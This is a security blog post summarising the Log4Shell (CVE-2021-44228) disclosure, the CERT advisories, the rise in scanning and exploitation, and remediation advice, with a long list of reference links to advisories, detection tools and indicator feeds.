//Blogs - 15 Dec 2021
Picture credit : Lunasec
Patch, check your patches work, check logs for attempts and possible compromise.
Log4Shell is a tag used by Lunasec to describe the vulnerability in Apache Log4j2 that was disclosed abruptly by a tweet and a github repo.
This sudden announcement alerted security professionals to work in a short time frame to protect systems and avoid other interested parties in discovering, compromising and potentially taking over systems.
Security groups alerted through the above were computer emergency response teams, which recognised the impact and came out with early advisories which are either being updated or are being referenced by newer advisories.
The attack surface was of prime concern and security professionals were exchanging ways to detect through various third party search results. One of the lists of the attack surface that was published early showed that Log4Shell or LogJam would affect a large number of systems. Ways to detect affected servers were refined into a script and other entities also released tools to detect vulnerable servers through first party scanning. First party scanning is not of concern but unauthorised second party scanning is. This activity was eventually detected, and exploit payloads soon followed.
The manner in which the vulnerability was disclosed gave a short time frame for the naming and grading. This was evident as the PSIRT initial only had release candidates which later were checked and reported that both had to be used.
The vulnerability was later allocated CVE-2021-44228 and carried the PSIRT’s analysis of a CVSSv3 base score of a perfect 10.0. (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). Before a full patch was available by the PSIRT, mitigations were collated and a vaccine made available to provide an easy way to mitigate the unauthorised second party scanning attempts to drop a malicious payload.
No doubt there will be more numerous and extensive reports made available by noted security organisations, as well as a plethora of resources listed to help, but the advice right now is as the TLDR, check your version, patch, check your patch, check your logs for attempts and possible compromise, and take remediation steps if any IoC show up.
In a time span no longer than a week CVE-2021-44228 has gone from proof of concept drop to internet wide scans to carrying crypto-coin miner payloads to no being found to carry ransomware payloads.
Finally, if your weekend was thought to be hectic as a result of this abrupt disclosure, send some positive thoughts to the three volunteers who maintain a piece of code that the internet has come to depend so much on. These three volunteers have worked very hard getting us a patch as soon as possible.
As well, we would like to thank all the contributors that have made this article possible by submitting to us relevant links and articles.
 Lunasec Advisory https://www.lunasec.io/docs/blog/log4j-zero-day/
 Tweeted 0-Day https://twitter.com/P0rZ9/status/1468949890571337731
 NZCERT https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/
 AusCERT ASB https://auscert.org.au/bulletins/ASB-2021.0244.2
 SingCERT https://www.csa.gov.sg/en/singcert/Alerts/al-2021-070
 AusCERT ESB https://www.auscert.org.au/bulletins/ESB-2021.4186
 Attack Surface https://github.com/YfryTchsGD/Log4jAttackSurface
 Randori Blog https://www.randori.com/blog/cve-2021-44228/
 log4j_rce_check https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
 Log4j2Scan https://github.com/whwlsfb/Log4j2Scan
 Qualys Detection https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell
 SocPrime https://socprime.com/blog/cve-2021-44228-detection-notorious-zero-day-in-log4j-java-library/
 Imperva https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/
 Log4j RCE Attempts https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
 Cloudflare Blog https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/
 PSIRT rc1 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
 PSIRT rc2 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
 CyberKendra https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
 NVDB https://nvd.nist.gov/vuln/detail/CVE-2021-44228
 RecordedMedia https://therecord.media/log4j-zero-day-gets-security-fix-just-as-scans-for-vulnerable-systems-ramp-up/
 PSIRT Advisory https://logging.apache.org/log4j/2.x/security.html
 PSIRT Download https://logging.apache.org/log4j/2.x/download.html
 Cybereason Blog https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228
 Cyberreason Vax https://github.com/Cybereason/Logout4Shell
 DarkReading https://www.darkreading.com/dr-tech/what-to-do-while-waiting-for-the-log4ju-updates
 PaloAlto https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
 Cloudflare Blog https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
 Cloudflare Blog https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
 Sygnia Advisory https://blog.sygnia.co/log4shell-remote-code-execution-advisory
 ISC SANS Diary https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/
 ISC SANS Diary https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/
 Crowdstrike https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
 Bleeping Computer https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
 Trusted Sec https://www.trustedsec.com/blog/log4j-playbook/
 Bleeping Computer https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
 Reddit List of resources on log4j https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/
 CVE-2021-44228-Log4Shell-Hashes https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
 NCSC-NL https://github.com/NCSC-NL/log4shell
 BlueTeam CheatSheet https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
 Log4ShellDetector https://github.com/Neo23x0/log4shell-detector
 Bazaar https://bazaar.abuse.ch/browse/tag/log4j
 URLHaus https://urlhaus.abuse.ch/browse/tag/log4j
 Threatfox https://threatfox.abuse.ch/browse/tag/log4j
 CuratedIntel https://github.com/curated-intel/Log4Shell-IOCs
 Microsoft Guidance https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
 TryHackme https://tryhackme.com/room/solar
 Twitter https://twitter.com/80vul/status/1470272820571963392?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Etweet
 Twitter https://twitter.com/ankit_anubhav/status/1470648109625536515
 Twitter “@FiloSottile” https://twitter.com/FiloSottile/status/1469441487175880711
 Twitter “@matthew_d_green” https://twitter.com/matthew_d_green/status/1469715416549367812
 ITNews https://www.itnews.com.au/news/log4js-project-sponsorship-skyrockets-after-critical-bug-exploitation-573914